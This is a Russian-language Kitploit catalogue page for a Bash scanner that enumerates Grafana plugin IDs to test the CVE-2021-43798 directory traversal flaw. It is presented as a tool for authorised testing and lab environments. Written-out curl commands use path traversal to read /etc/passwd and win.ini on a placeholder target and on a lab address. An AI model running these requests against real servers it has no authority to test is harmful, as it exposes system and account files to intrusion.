Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Grafana-Plugin-Enumerator-CVE-2021-43798 — Сканер на основе Bash, который перечисляет идентификаторы плагинов Grafana и проверяет наличие обхода каталогов CVE-2021-43798, пытаясь прочитать /etc/passwd или win.ini на уязвимых экземплярах. | Kitploit
Инструменты/GitHubGitHub/squ1shification/grafana-plugin-enumerator-cve-2021-43798
Сканеры уязвимостейСканеры веб-уязвимостейЭксплуатацияСкриптинг и автоматизацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHub
squ1shification/grafana-plugin-enumerator-cve-2021-43798

Grafana-Plugin-Enumerator-CVE-2021-43798

Сканер на основе Bash, который перечисляет идентификаторы плагинов Grafana и проверяет наличие обхода каталогов CVE-2021-43798, пытаясь прочитать /etc/passwd или win.ini на уязвимых экземплярах.

Репозиторий
114 ч 15 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Grafana CVE-2021-43798 Plugin Enumerator

Небольшой инструмент на Bash для проверки экземпляров Grafana на наличие CVE-2021-43798 — уязвимости обхода каталога, затрагивающей уязвимые версии Grafana.

Инструмент перебирает идентификаторы плагинов Grafana и использует curl --path-as-is для проверки того, может ли обход каталога обеспечить доступ к известному файлу.

Только для авторизованного тестирования безопасности и лабораторных сред.

Файлы

root@kitploit:~
.
├── grafana-windows.sh
├── grafana-linux.sh
├── plugins.txt
└── README.md
  • grafana-windows.sh: Проверяет доступ к C:\Windows\win.ini
  • grafana-linux.sh: Проверяет доступ к /etc/passwd
  • plugins.txt: Словарь, содержащий идентификаторы плагинов Grafana, используемые при переборе.

Требования

  • Bash
  • curl
  • Целевой экземпляр Grafana
  • Разрешение на тестирование цели

Проверьте, что curl установлен:

root@kitploit:~
curl --version

Сделайте скрипты исполняемыми:

root@kitploit:~
chmod +x grafana-windows.sh
chmod +x grafana-linux.sh

Обзор CVE-2021-43798

CVE-2021-43798 — это уязвимость обхода каталога в Grafana.

Уязвимая конечная точка основана на: /public/plugins/<plugin-id>/

Уязвимость может позволить обход за пределы предполагаемого каталога плагинов.

Важный момент при тестировании с помощью curl: --path-as-is

Без этой опции клиент может нормализовать путь перед отправкой на сервер.

Сканер для Windows

Сканер для Windows пытается получить: C:\Windows\win.ini

В HTTP-запросе путь представляется как: Windows/win.ini

Базовое использование

root@kitploit:~
./grafana-windows.sh \
    -u http://192.168.68.193:3000 \
    -w plugins.txt

Пример:

root@kitploit:~
./grafana-windows.sh -u http://TARGET:3000 -w plugins.txt

Ручная проверка для Windows

Вы можете вручную проверить плагин с помощью:

root@kitploit:~
curl --path-as-is \
"http://TARGET:3000/public/plugins/alertlist/../../../../../../../../Windows/win.ini"

Для лабораторной цели:

root@kitploit:~
curl --path-as-is \
"http://192.168.68.193:3000/public/plugins/alertlist/../../../../../../../../Windows/win.ini"

Успешный ответ должен содержать содержимое Windows INI-файла.

Сканер для Linux

Сканер для Linux пытается получить: /etc/passwd

Базовое использование

root@kitploit:~
./grafana-linux.sh \
    -u http://192.168.68.193:3000 \
    -w plugins.txt

Общий пример:

root@kitploit:~
./grafana-linux.sh -u http://TARGET:3000 -w plugins.txt

Ручная проверка для Linux

root@kitploit:~
curl --path-as-is \
"http://TARGET:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"

Для лабораторной цели:

root@kitploit:~
curl --path-as-is \
"http://192.168.68.193:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"

Успешный ответ для Linux должен содержать записи, подобные:

root@kitploit:~
root:x:0:0:root:/root:/bin/bash

Параметры командной строки

Оба сканера используют одни и те же базовые аргументы:

  • u, --url : базовый URL Grafana
  • w, --wordlist : словарь плагинов
  • f, --file : файл для проверки
  • h, --help : показать справку
Скачать инструмент